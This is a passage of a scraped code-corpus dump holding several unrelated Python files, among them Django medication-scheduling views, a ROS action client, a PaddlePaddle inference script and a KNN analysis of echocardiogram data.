thalach\n self.exang = exang\n self.oldpeak = oldpeak\n self.slope = slope\n self.ca = ca\n self.thal = thal\n self.predict = predict\n self.probability = prob\n\nclass PhoneNumbers(Base):\n __tablename__='phoneNumbers'\n id = Column(Integer, primary_key=True)\n email = Column(String(250),nullable=False)\n mobile1 = Column(String(250),nullable=False)\n mobile2 = Column(String(250),nullable=False)\n mobile3 = Column(String(250),nullable=False)\n\n def __init__(self,email,mobile1,mobile2,mobile3):\n self.email=email\n self.mobile1=mobile1\n self.mobile2=mobile2\n self.mobile3=mobile3\n\nengine = create_engine(connector)\n#'sqlite:///computer_jii.db'\nBase.metadata.create_all(engine)","sub_path":"database_connector/dto.py","file_name":"dto.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"600986639","text":"import datetime\nimport json\n\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\n\nfrom MedWeb import settings\nfrom MedWeb.clinical_database.clinical_database import medications\nfrom MedWeb.clinical_judgements.schedule_logic import patient_active_schedules, patient_active_medication_ids\nfrom MedWeb.concentrator_interface.interface import schedules\nfrom MedWeb.concentrator_interface.interface import update_from_concentrator, get_patient_dose_instances\nfrom MedWeb.patient_database.patient_database import patients\n\nsidebar_menu_urls = {\"Medications\": \"/viewpatient\",\n \"Schedule & History\": \"/schedule\",\n \"Add Medication\": \"/assignmedication\"}\n\nsidebar_menu_entries = [\"Medications\", \"Schedule & History\", \"Add Medication\"]\n\n\ndef browse_patients(request):\n template = get_template(\"medication/browse_patients.djt.html\")\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_section\": \"patients\",\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"patients\": patients.values(),\n \"warning_count\": sum((patient.warnings for patient in patients.values())),\n \"active_patient\": None}, request)\n return HttpResponse(output)\n\n\ndef patient_summary(request):\n patient_uuid = request.GET.get(\"patient_uuid\", None)\n todayDate = datetime.date.today()\n if patient_uuid is None:\n return browse_patients(request)\n print(patients[patient_uuid].status)\n template = get_template(\"medication/medication_summary.djt.html\")\n dose_instances = get_patient_dose_instances(patient_uuid, todayDate - datetime.timedelta(\n todayDate.weekday()), todayDate - datetime.timedelta(\n todayDate.weekday()) + datetime.timedelta(days=7))\n for dose_instance in dose_instances:\n dose_date = dose_instance.schedule.start_date + datetime.timedelta(days=dose_instance.day)\n dose_instance.start_datetime = datetime.datetime.combine(dose_date, dose_instance.start_time)\n dose_instance.end_datetime = datetime.datetime.combine(dose_date, dose_instance.end_time)\n if dose_instance.start_datetime > datetime.datetime.now():\n dose_instance.color = \"#ADECFF\"\n elif dose_instance.taken_dose_uuid is not None:\n dose_instance.color =\"#8BFF8E\"\n else:\n dose_instance.color = \"#FF8B8E\"\n\n patient_schedules = list(patients[patient_uuid].schedules)\n patient_schedules.sort(key=lambda s: s.medication.short_name)\n patient_schedules.sort(key=lambda s: s.start_date)\n dose_instances.sort(key=lambda d: d.start_datetime)\n dose_instances.sort(key=lambda d: d.schedule.medication.full_name)\n print([schedule for schedule in patient_schedules])\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Medications\",\n \"active_section\": \"patients\",\n \"active_patient\": patients[patient_uuid],\n \"dose_instances\": dose_instances,\n \"schedules\": patient_schedules}, request)\n return HttpResponse(output)\n\n\ndef assign_medication(request):\n patient_uuid = request.GET.get(\"patient_uuid\", None)\n if patient_uuid is None:\n return browse_patients(request)\n template = get_template(\"medication/assign_medication.djt.html\")\n active_medications = patient_active_medication_ids(patients[patient_uuid])\n print(active_medications)\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Add Medication\",\n \"active_section\": \"patients\",\n \"active_patient\": patients[patient_uuid],\n \"active_patient_medication_ids\": json.dumps(\n active_medications),\n \"medications\": medications.values(),\n }, request)\n return HttpResponse(output)\n\n\ndef create_new_schedule(request):\n patient_uuid = request.GET.get(\"patient_uuid\", None)\n if patient_uuid is None:\n return browse_patients(request)\n medication_id_str = request.GET.get(\"mid\", None)\n if medication_id_str is None:\n return assign_medication(request)\n medication_id = int(medication_id_str)\n template = get_template(\"medication/schedule_editor.html\")\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"active_section\": \"patients\",\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Add Medication\",\n \"active_patient\": patients[patient_uuid],\n \"active_medication\": medications[medication_id],\n \"mode\": 'create'}, request)\n return HttpResponse(output)\n\n\ndef modify_schedule(request):\n schedule_id_str = request.GET.get(\"schedule_id\", None)\n if schedule_id_str is None:\n return patient_summary(request)\n schedule_id = int(schedule_id_str)\n print(schedule_id)\n print(schedules)\n exclusive_for_this_medication = len([schedule for schedule in schedules[schedule_id].patient.schedules if schedule.medication_id == schedules[schedule_id].medication_id]) <= 1\n template = get_template(\"medication/schedule_editor.html\")\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"active_section\": \"patients\",\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Medications\",\n \"active_patient\": schedules[schedule_id].patient,\n \"active_schedule\": schedules[schedule_id],\n \"active_medication\": schedules[schedule_id].medication,\n \"mode\": 'modify',\n \"enable_start_date_change\": schedules[schedule_id].start_date > datetime.date.today() and exclusive_for_this_medication}, request)\n return HttpResponse(output)\n\n\ndef query_concentrator(request):\n update_from_concentrator()\n","sub_path":"MedManagementWeb/MedWeb/MedWeb/medication_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167730251","text":"from __future__ import division , print_function\nimport sys\nimport os\nimport glob\nimport multiprocessing as mproc\n\n\n\ndef run_command( command_line , sino_file , ang_file ):\n command_line_var = command_line + '-i ' + sino_file + ' -g ' + ang_file\n print( command_line_var )\n os.system( command_line_var ) \n\n\n\n\ndef main():\n path_common_in = '/home/arcusfil/tomcat/Data/poster_benjing_14_04_27/data'\n path_spec_in = 'sin_lung_tissue_dilated_versions_admm_est_noisy/polar'\n path_spec_out = 'sin_lung_tissue_dilated_versions_admm_est_noisy_downsampled/polar'\n\n\n label_sino = '.DMP'\n label_angfile = '.txt'\n\n\n curr_dir = os.getcwd()\n os.chdir( path_common_in + '/' + path_spec_in )\n sino_files = glob.glob( '*' + label_sino + '*' )\n angfile_files = glob.glob( '*' + label_angfile + '*' )\n\n if len( sino_files ) != len( angfile_files ):\n sys.exit('\\nERROR: number of .DMP', len( sino_files ),' differs from number \\\n of .txt files ', len( angfile_files ))\n\n os.chdir( curr_dir )\n\n\n command_line = 'python downsample_sinogram.py '\n command_line += '-Di ' + path_common_in + '/' + path_spec_in + ' '\n command_line += '-Do ' + path_common_in + '/' + path_spec_out + ' ' \n\n\n pool = mproc.Pool()\n for f in range( len( sino_files ) ):\n pool.apply_async( run_command , ( command_line , sino_files[f] ,\n angfile_files[f] ) )\n pool.close()\n pool.join()\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"downsample_sinogram/downsample_sinogram_wrapper.py","file_name":"downsample_sinogram_wrapper.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"322583639","text":"import os, sys, string, glob, math\n\ndef primes(n):\n\tif n < 2: return []\n\tif n == 2: return [2]\n\ts = range(3, n, 2)\n\tmroot = n ** 0.5\n\thalf = len(s)\n\ti = 0\n\tm = 3\n\twhile m <= mroot:\n\t\tif s[i]:\n\t\t\tj = (m * m - 3)//2\n\t\t\ts[j] = 0\n\t\t\twhile j < half:\n\t\t\t\ts[j] = 0\n\t\t\t\tj += m\n\t\ti = i + 1\n\t\tm = 2 * i + 3\n\treturn [2]+[x for x in s if x]\n\t\nimport p25\n#import p14\n#import p13\n#import p2\n#import p3\n#import p5\n#import p3\n#import p4\n#import p8\t\n#import p53\n\n","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"497136213","text":"def longestPalindromicSubstring(string):\n # Write your code here.\n longest = \"\"\n if len(string) == 1:\n return string\n for i in range(len(string)):\n for j in range(1, len(string)):\n subString = string[i:j+1]\n if len(subString) > len(longest) and isPalindrome(subString):\n longest = subString\n return longest\n\n\ndef isPalindrome(string):\n # Write your code here.\n reverse_chars = []\n for i in reversed(range(len(string))):\n reverse_chars.append(string[i])\n return \"\".join(reverse_chars) == string\n","sub_path":"AlgoExpert/longestPalindromicSubstring/n^3.py","file_name":"n^3.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491348192","text":"#!/usr/bin/env python\nfrom __future__ import division, print_function\nimport rospy\nimport actionlib\nimport sys\n\nfrom amee_controllers.msg import DumbMoveAction, DumbMoveFeedback, DumbMoveResult, DumbMoveGoal\n\n\ndef feedback_cb(feedback):\n print(feedback)\n\n\ndef position_client(x, y, deg, cancel=False):\n print('dumb_move_action')\n client = actionlib.SimpleActionClient('dumb_move_action', DumbMoveAction)\n\n # Waits until the action server has started up and started\n # listening for goals.\n print(\"waitign for server\")\n client.wait_for_server()\n print(\"done waiting for server\")\n # Creates a goal to send to the action server.\n goal = DumbMoveGoal(x=x, y=y, deg=deg)\n\n # Sends the goal to the action server.\n client.send_goal(goal, feedback_cb=feedback_cb)\n\n if cancel:\n decision = raw_input(\"Cancel Y/n?\")\n if not decision.startswith('n'):\n client.cancel_goal()\n\n print(\"waiting for result...\")\n # Waits for the server to finish performing the action.\n client.wait_for_result()\n\n # Prints out the result of executing the action\n return client.get_result() # A FibonacciResult\n\nif __name__ == '__main__':\n try:\n try:\n x = float(sys.argv[1])\n y = float(sys.argv[2])\n deg = float(sys.argv[3])\n except:\n x = 8\n y = 8\n deg = 0\n\n cancel = len(sys.argv) < 5\n print(sys.argv)\n\n rospy.init_node('dumb_move_action_client')\n result = position_client(x, y, deg, cancel)\n\n except rospy.ROSInterruptException:\n print(\"program interrupted before completion\", file=sys.stderr)\n\n print(\"done\")\n rospy.spin()\n","sub_path":"src/amee_controllers/test/dumb_move_action_client.py","file_name":"dumb_move_action_client.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101745519","text":"from os import system\nfrom config import Bcolors, welcome_message\nimport sys\nfrom server.config import Server\nfrom client.main import Client\n\n\nclass Main:\n\n def __init__(self):\n self.running = True\n\n def start(self):\n\n try:\n system('clear')\n welcome = ''\n print(Bcolors.OKBLUE + \"BEM VINDO! Escolha a opçao para iniciar\" + Bcolors.ENDC)\n sys.stdout.write(Bcolors.OKGREEN + welcome + Bcolors.ENDC)\n print('1 - Criar Sala')\n print('2 - Entrar em sala')\n choice = int(input('>>> '))\n\n if choice == 1:\n server = Server()\n server.run()\n server.start()\n elif choice == 2:\n system('clear')\n client = Client()\n client.start()\n\n else:\n print(Bcolors.FAIL + '--- COMANDO INVALIDO ---' + Bcolors.ENDC)\n print('pressione qualquer tecla para continuar')\n input()\n\n except Exception as e:\n print(e)\n print(Bcolors.FAIL + '--- OCORREU UM ERRO ---' + Bcolors.ENDC)\n print('pressione qualquer tecla para continuar')\n input()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486801114","text":"# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport glob\n\nimport numpy as np\n\nfrom paddle import fluid\n\nfrom ppdet.core.workspace import load_config, merge_config, create\nfrom ppdet.modeling.model_input import create_feeds\nfrom ppdet.data.data_feed import create_reader\n\nfrom ppdet.utils.eval_utils import parse_fetches\nfrom ppdet.utils.cli import parse_args\nfrom ppdet.utils.visualizer import visualize_results\nimport ppdet.utils.checkpoint as checkpoint\n\nimport logging\nFORMAT = '%(asctime)s-%(levelname)s: %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\n\ndef get_test_images(infer_dir, infer_img):\n \"\"\"\n Get image path list in TEST mode\n \"\"\"\n assert infer_img is not None or infer_dir is not None, \\\n \"--infer-img or --infer-dir should be set\"\n images = []\n\n # infer_img has a higher priority\n if infer_img and os.path.isfile(infer_img):\n images.append(infer_img)\n return images\n\n infer_dir = os.path.abspath(infer_dir)\n assert os.path.isdir(infer_dir), \\\n \"infer_dir {} is not a directory\".format(infer_dir)\n for fmt in ['jpg', 'jpeg', 'png', 'bmp']:\n images.extend(glob.glob('{}/*.{}'.format(infer_dir, fmt)))\n\n assert len(images) > 0, \"no image found in {} with \" \\\n \"extension {}\".format(infer_dir, image_ext)\n logger.info(\"Found {} inference images in total.\".format(len(images)))\n\n return images\n\n\ndef main():\n args = parse_args()\n cfg = load_config(args.config)\n\n if 'architecture' in cfg:\n main_arch = cfg['architecture']\n else:\n raise ValueError(\"'architecture' not specified in config file.\")\n\n merge_config(args.cli_config)\n\n if 'test_feed' not in cfg:\n test_feed = create(main_arch + 'TestFeed')\n else:\n test_feed = create(cfg['test_feed'])\n\n test_images = get_test_images(args.infer_dir, args.infer_img)\n test_feed.dataset.add_images(test_images)\n\n place = fluid.CUDAPlace(0) if cfg['use_gpu'] else fluid.CPUPlace()\n exe = fluid.Executor(place)\n\n model = create(main_arch)\n\n startup_prog = fluid.Program()\n infer_prog = fluid.Program()\n with fluid.program_guard(infer_prog, startup_prog):\n with fluid.unique_name.guard():\n _, feed_vars = create_feeds(test_feed, use_pyreader=False)\n test_fetches = model.test(feed_vars)\n infer_prog = infer_prog.clone(True)\n\n reader = create_reader(test_feed)\n feeder = fluid.DataFeeder(place=place, feed_list=feed_vars.values())\n\n exe.run(startup_prog)\n if cfg['weights']:\n checkpoint.load_checkpoint(exe, infer_prog, cfg['weights'])\n\n # parse infer fetches\n extra_keys = []\n if cfg['metric'] == 'COCO':\n extra_keys = ['im_info', 'im_id', 'im_shape']\n keys, values, _ = parse_fetches(test_fetches, infer_prog, extra_keys)\n\n # 6. Parse dataset category\n if cfg['metric'] == 'COCO':\n from ppdet.utils.coco_eval import bbox2out, mask2out, get_category_info\n if cfg['metric'] == \"VOC\":\n # TODO(dengkaipeng): add VOC metric process\n pass\n\n anno_file = getattr(test_feed.dataset, 'annotation', None)\n with_background = getattr(test_feed, 'with_background', True)\n clsid2catid, catid2name = get_category_info(anno_file, with_background)\n\n imid2path = reader.imid2path\n for iter_id, data in enumerate(reader()):\n outs = exe.run(infer_prog,\n feed=feeder.feed(data),\n fetch_list=values,\n return_numpy=False)\n res = {\n k: (np.array(v), v.recursive_sequence_lengths())\n for k, v in zip(keys, outs)\n }\n logger.info('Infer iter {}'.format(iter_id))\n\n im_id = int(res['im_id'][0])\n image_path = imid2path[im_id]\n if cfg['metric'] == 'COCO':\n bbox_results = None\n mask_results = None\n if 'bbox' in res:\n bbox_results = bbox2out([res], clsid2catid)\n if 'mask' in res:\n mask_results = mask2out([res], clsid2catid,\n cfg['MaskHead']['resolution'])\n visualize_results(image_path, catid2name, 0.5, bbox_results,\n mask_results)\n\n if cfg['metric'] == \"VOC\":\n # TODO(dengkaipeng): add VOC metric process\n pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"PaddleCV/object_detection/tools/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"174863432","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 15 20:29:28 2018\r\n\r\n@author: Gandhi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom pylab import rcParams\r\nimport seaborn as sb\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import scale\r\n\r\nfrom collections import Counter\r\nfrom sklearn.metrics import *\r\n\r\n#Loading your dataset\r\nurl = \"https://archive.ics.uci.edu/ml/machine-learning-databases/echocardiogram/echocardiogram.data\"\r\n\r\nEchocardiogram_df = pd.read_csv(url, header= None, error_bad_lines=False, sep=',')\r\ncol = [\"survival \", \"still-alive\", \"age-at-heart-attack\", \"pericardial-effusion\",\"fractional-shortening\", \"E-point septal separation\", \"left ventricular end-diastolic\", \"wall-motion-score\",\"wall-motion-index\",\"mult\",\"name \", \"group \", \"alive-at-1\" ]\r\nEchocardiogram_df.columns = col\r\nprint ('Check first 5 rows of the table ')\r\nprint(Echocardiogram_df.head())\r\n\r\n\r\nprint ('Check Last 5 rows of the table ')\r\nprint(Echocardiogram_df.tail())\r\n# check the total number of rows and column\r\n\r\nprint ('Print total number of rows and columns ')\r\nprint (Echocardiogram_df.shape)\r\n\r\nprint ('Print name of the columns ')\r\nprint(Echocardiogram_df.columns)\r\n\r\nEchocardiogram_df.drop(['E-point septal separation'],axis = 1, inplace= True)\r\nprint ('Print name of the columns ')\r\nprint(Echocardiogram_df.columns)\r\n\r\n# remove the space between the words \r\n# Changing the (' ') into (_) in coulumn names\r\n\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.strip()\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.replace(' ','_')\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.replace('-','_')\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.replace('\\n',' ')\r\nprint(Echocardiogram_df.columns)\r\n\r\nprint ('Check Type of the data ') \r\nprint(Echocardiogram_df.dtypes)\r\n\r\n\r\n# #checking the missing value per column to decide which column to drop? \r\n\r\nEchocardiogram_df = Echocardiogram_df.replace('[?]', np.NaN, regex = True)\r\nprint(Echocardiogram_df.isnull().sum())\r\nEchocardiogram_df.columns.tolist()\r\nEchocardiogram_df.drop(['alive_at_1'],axis= 1, inplace= True)\r\n\r\n\r\nprint(Echocardiogram_df.columns)\r\n\r\n# Try to drop the row where 3 columns out of 6 columns have all NAN values. row 32 has 3 NAN values. we are expecting to drop this column.\r\n\r\nprint(Echocardiogram_df.dropna(subset=['age_at_heart_attack','fractional_shortening','left_ventricular_end_diastolic'],how ='all',inplace =True))\r\n\r\nEchocardiogram_df =Echocardiogram_df[['survival', 'age_at_heart_attack','pericardial_effusion','fractional_shortening', 'left_ventricular_end_diastolic', 'wall_motion_index','still_alive']].astype(float)\r\n\r\nprint ('Check Type of the data ') \r\nprint(Echocardiogram_df.dtypes)\r\n\r\n\r\nEchocardiogram_df ['age_at_heart_attack'] = Echocardiogram_df ['age_at_heart_attack'].astype(float)\r\nMeans = np.mean(Echocardiogram_df ['age_at_heart_attack'], axis=0)\r\nprint(Means)\r\nMeans_round = float(str(round(Means, 2)))\r\nEchocardiogram_df ['age_at_heart_attack']=Echocardiogram_df ['age_at_heart_attack'].replace(np.nan, Means_round)\r\n\r\nprint(Echocardiogram_df ['fractional_shortening'].dtypes)\r\nEchocardiogram_df ['fractional_shortening'] = Echocardiogram_df ['fractional_shortening'].astype(float)\r\nMedian = np.nanmedian(Echocardiogram_df.loc[:,\"fractional_shortening\"])\r\nprint(Median)\r\nIsNan = np.isnan(Echocardiogram_df.loc[:,\"fractional_shortening\"])\r\nEchocardiogram_df.loc[IsNan,\"fractional_shortening\"] = Median\r\nEchocardiogram_df ['wall_motion_index'].fillna(method ='ffill', inplace =True)\r\n\r\nEchocardiogram_df ['left_ventricular_end_diastolic'] = Echocardiogram_df ['left_ventricular_end_diastolic'].astype(float)\r\nMeans = np.mean(Echocardiogram_df ['left_ventricular_end_diastolic'], axis=0)\r\nprint(Means)\r\nMeans_round = float(str(round(Means, 2)))\r\nEchocardiogram_df ['left_ventricular_end_diastolic']=Echocardiogram_df ['left_ventricular_end_diastolic'].replace(np.nan, Means_round)\r\n\r\nEchocardiogram_df ['survival'].fillna(method ='ffill', inplace =True)\r\nprint(Echocardiogram_df.isnull().sum())\r\n\r\n# I am going to remove the outliers from below columns which could have been added wrongly.\r\n# \r\n# 'FRACTIONAL_SHORTENING' - lower numbers are increasingly abnormal\r\n# 'LEFT_VENTRICULAR_END_DIASTOLIC -Size of heart\r\n\r\ndef outliers(data):\r\n q1= np.percentile(data,25)\r\n q3 = np.percentile(data,75)\r\n lower = q1-1.5*(q3-q1)\r\n upper = q1+1.5*(q3-q1)\r\n flag =(data <= lower)|(data >= upper)\r\n q2 = np.median(data)\r\n data[flag] = q2\r\n return(data)\r\n\r\nEchocardiogram_df ['fractional_shortening'] = outliers (Echocardiogram_df ['fractional_shortening'])\r\nEchocardiogram_df ['left_ventricular_end_diastolic']= outliers (Echocardiogram_df ['left_ventricular_end_diastolic'])\r\nEchocardiogram_df.head(25)\r\n\r\nx= np.ravel(Echocardiogram_df ['fractional_shortening'])\r\nX= pd.DataFrame(x)\r\ndata = MinMaxScaler().fit_transform(X)\r\nEchocardiogram_df ['fractional_shortening']=data\r\nprint(Echocardiogram_df ['fractional_shortening'])\r\n\r\nx= np.ravel(Echocardiogram_df ['left_ventricular_end_diastolic'])\r\nX= pd.DataFrame(x)\r\ndata = MinMaxScaler().fit_transform(X)\r\nEchocardiogram_df ['left_ventricular_end_diastolic']=data\r\nprint(Echocardiogram_df ['left_ventricular_end_diastolic'])\r\n\r\nx= np.ravel(Echocardiogram_df ['wall_motion_index'])\r\nX= pd.DataFrame(x)\r\ndata = MinMaxScaler().fit_transform(X)\r\nEchocardiogram_df ['wall_motion_index']=data\r\nprint(Echocardiogram_df ['wall_motion_index'])\r\n\r\nEchocardiogram_df.head(25).round(3)\r\n\r\n# let's reduce this range appling the binning to get more accuracy on the result.\r\nNB =5\r\nbounds = np.linspace(np.min(x), np.max(x), NB + 1) \r\nx= np.ravel(Echocardiogram_df ['survival'])\r\nX= pd.DataFrame(x)\r\n\r\nbounds = np.linspace(np.min(x), np.max(x), NB + 1)\r\nprint (bounds)\r\n\r\ndef bin(x, b): \r\n nb = len(b)\r\n N = len(x)\r\n y = np.empty(N, int) \r\n \r\n for i in range(1, nb):\r\n y[(x >= bounds[i-1])&(x < bounds[i])] = i\r\n \r\n y[x == bounds[-1]] = nb - 1\r\n return y\r\n\r\nbx = bin(x, bounds)\r\nprint (\"\\n\\nBinned variable x, for \", NB, \"bins\\n\")\r\nprint (\"Bin boundaries: \", bounds)\r\nprint (\"Binned variable: \", bx)\r\n\r\nEchocardiogram_df['survival'] = bx\r\n\r\n\r\nNB =5\r\nbounds = np.linspace(np.min(x), np.max(x), NB + 1) \r\nx= np.ravel(Echocardiogram_df ['age_at_heart_attack'])\r\nX= pd.DataFrame(x)\r\n\r\nbounds = np.linspace(np.min(x), np.max(x), NB + 1)\r\nprint (bounds)\r\n\r\ndef bin(x, b): \r\n nb = len(b)\r\n N = len(x)\r\n y = np.empty(N, int) \r\n \r\n for i in range(1, nb):\r\n y[(x >= bounds[i-1])&(x < bounds[i])] = i\r\n \r\n y[x == bounds[-1]] = nb - 1\r\n return y\r\n\r\nbx = bin(x, bounds)\r\nprint (\"\\n\\nBinned variable x, for \", NB, \"bins\\n\")\r\nprint (\"Bin boundaries: \", bounds)\r\nprint (\"Binned variable: \", bx)\r\n\r\nEchocardiogram_df['age_at_heart_attack'] = bx\r\n\r\n\r\nEchocardiogram_df.head(25).head(3)\r\nEchocardiogram_df.round(3)\r\n\r\n# Packages for visuals\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns; \r\nsns.set(font_scale=1.2)\r\n\r\n# Allows charts to appear in the notebook\r\nget_ipython().magic('matplotlib inline')\r\n\r\nsns.lmplot('fractional_shortening','left_ventricular_end_diastolic', data=Echocardiogram_df, hue='still_alive',\r\n palette='Set1', fit_reg=False, scatter_kws={\"s\": 30});\r\n\r\n\r\n# visualize the relationship between the features and the response using scatterplots\r\nsns.set(font_scale=1.5)\r\nsns.pairplot(Echocardiogram_df, hue =\"still_alive\", palette ='Set1')\r\nplt.show()\r\n\r\n#define X and y\r\nX= Echocardiogram_df[['survival','age_at_heart_attack','pericardial_effusion','fractional_shortening','left_ventricular_end_diastolic', 'wall_motion_index']].as_matrix()\r\ny= Echocardiogram_df['still_alive']\r\n\r\n#Split the dataset into two pieces: a training set and a testing set.\r\n# Train the model on the training set.\r\n# Test the model on the testing set, and evaluate how well we did.\r\n\r\nfrom sklearn.cross_validation import train_test_split\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1, test_size =.3)\r\n\r\nprint(X_train.shape)\r\n\r\nprint(X_test.shape)\r\nprint(y_train.shape)\r\n\r\nprint(y_test.shape)\r\n\r\n\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=5)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\n\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n#Repeat for KNN with K=1:\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=1)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\n\r\n\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n#Repeat for KNN with K=2:\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=2)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n# try K=1 through K=25 and record testing accuracy\r\nk_range = list(range(1, 26))\r\nscores = []\r\nfor k in k_range:\r\n knn = KNeighborsClassifier(n_neighbors=k)\r\n knn.fit(X_train, y_train)\r\n y_pred = knn.predict(X_test)\r\n scores.append(accuracy_score(y_test, y_pred))\r\n \r\n # import Matplotlib (scientific plotting library)\r\nimport matplotlib.pyplot as plt\r\n\r\n# allow plots to appear within the notebook\r\nget_ipython().magic('matplotlib inline')\r\n\r\n# plot the relationship between K and testing accuracy\r\nplt.plot(k_range, scores)\r\nplt.xlabel('Value of K for KNN')\r\nplt.ylabel('Testing Accuracy')\r\n\r\n\r\n# Graph shows that I can pick any number between 13 to 23. let's take K = 15\r\n#Repeat for KNN with K=15:\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=15)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n\r\n# Create a function to guess when a patient is alive or dead\r\ndef Alive_or_Dead(survival,age_at_heart_attack,pericardial_effusion,fractional_shortening,\r\nleft_ventricular_end_diastolic,wall_motion_index):\r\n \r\n if(knn.predict([[survival,age_at_heart_attack,pericardial_effusion,fractional_shortening,\r\nleft_ventricular_end_diastolic,wall_motion_index]]))==0:\r\n print('You\\'re looking at a Alive person!')\r\n else:\r\n print('You\\'re looking at a Dead person!')\r\n# Predict if person is alive or not\r\nAlive_or_Dead(3,1,.1,.448,.22,.135)\r\n\r\n# compare actual response values (y_test) with predicted response values (y_pred)\r\nAR =accuracy_score(y_test, y_pred)\r\nprint(AR)\r\n\r\n# \r\n# All the patients suffered heart attacks at some point in the past.\r\n# Some are still alive and some are not. The survival and still-alive\r\n# variables, when taken together, indicate whether a patient survived\r\n# for at least one year following the heart attack.\r\n# \r\n# What am I going to predict?\r\n# Is patient still alive or dead?\r\n# \r\n# \r\n# There is an outcome we are trying to predict - Supervised learning\r\n# These are the steps to classify the survival rate of the patient. \r\n# \r\n# 1.Find the data\r\n# 2.Apply a data science model\r\n# 3.Review the results\r\n'''\r\nImport statements for libraries \r\nloaded dataset\r\nused minmax Functions to normalize the data\r\nused KNN classifier with parameters\r\nOutput of your predicted and actual values seems to be correct\r\n'''\r\n\r\n# \r\n","sub_path":"TruptiGandhi-L08-DataModelBuild_Final-2.py","file_name":"TruptiGandhi-L08-DataModelBuild_Final-2.py","file_ext":"py","file_size_in_byte":11338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"185562824","text":"#!/usr/bin/env\n# -*- coding:utf-8 -*-\n\"\"\"\n@version: 1.0\n@author: 'user'\n@license: Apache Licence \n@contact: hrbuy2012@163.com\n@site: \n@software: PyCharm\n@file: 